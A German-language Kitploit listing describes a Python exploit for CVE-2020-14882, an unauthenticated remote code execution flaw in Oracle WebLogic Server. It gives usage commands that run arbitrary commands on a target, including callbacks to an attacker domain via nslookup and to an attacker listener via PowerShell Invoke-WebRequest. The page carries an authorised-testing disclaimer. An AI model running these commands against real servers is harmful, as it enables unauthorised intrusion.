Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-14882 — Dieses Skript ermöglicht die Remote-Code-Ausführung (RCE) auf Oracle WebLogic Server. | Kitploit
Tools/GitHubGitHub/danny-lli/cve-2020-14882
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubdanny-lli/cve-2020-14882

CVE-2020-14882

Dieses Skript ermöglicht die Remote-Code-Ausführung (RCE) auf Oracle WebLogic Server.

Repository anzeigen
21vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-14882

Dieses Skript ermöglicht die Remote-Code-Ausführung (RCE) auf Oracle WebLogic Server mithilfe einer nicht authentifizierten GET-Anfrage. Es nutzt die Sicherheitslücke CVE-2020-14882 aus. Durch die Ausführung beliebiger Befehle kann ein Angreifer unbefugten Zugriff auf den Server erlangen.

Details zum Exploit

  • Exploit-Titel: Oracle WebLogic Server, nicht authentifizierte RCE über GET-Anfrage
  • Exploit-Autor: Danny Safaya
  • CVE: CVE-2020-14882
  • Hersteller-Website: Oracle WebLogic Server
  • Software-Link: Oracle Middleware Downloads
  • Weitere Informationen: Analyse: WebLogic RCE durch nur eine GET-Anfrage (CVE-2020-14882)

Verwendung

Stellen Sie sicher, dass Python 3 installiert ist. Um dieses Skript zu verwenden, gehen Sie wie folgt vor:

  1. Öffnen Sie ein Terminal oder eine Eingabeaufforderung.

  2. Führen Sie das Skript mit dem folgenden Befehl aus:

    root@kitploit:~
    python3 exploit.py http(s)://target:7001 command
    

    Ersetzen Sie http(s)://target:7001 durch die Ziel-URL des Oracle WebLogic Servers und command durch den gewünschten auszuführenden Befehl.

    Beispiel 1:

    root@kitploit:~
    python3 exploit.py http(s)://target:7001 "nslookup your_Domain"
    

    Dieses Beispiel führt den Befehl nslookup your_Domain auf dem Zielserver aus.

    Beispiel 2:

    root@kitploit:~
    python3 exploit.py http(s)://target:7001 "powershell.exe -c Invoke-WebRequest -Uri http://your_listener"
    

    Dieses Beispiel führt den PowerShell-Befehl Invoke-WebRequest -Uri http://your_listener auf dem Zielserver aus.

Warnung

Dieses Skript ist ausschließlich für autorisierte Penetrationstests und Sicherheitsforschungszwecke bestimmt. Die unbefugte Nutzung dieses Skripts zum Ausnutzen von Systemen ohne entsprechende Zustimmung ist illegal und kann rechtliche Konsequenzen haben. Verwendung auf eigene Gefahr.

Abhängigkeiten

Dieses Skript erfordert die folgenden Abhängigkeiten:

  • requests
  • urllib3

Bitte stellen Sie sicher, dass diese Abhängigkeiten installiert sind, bevor Sie das Skript ausführen.


Tool herunterladen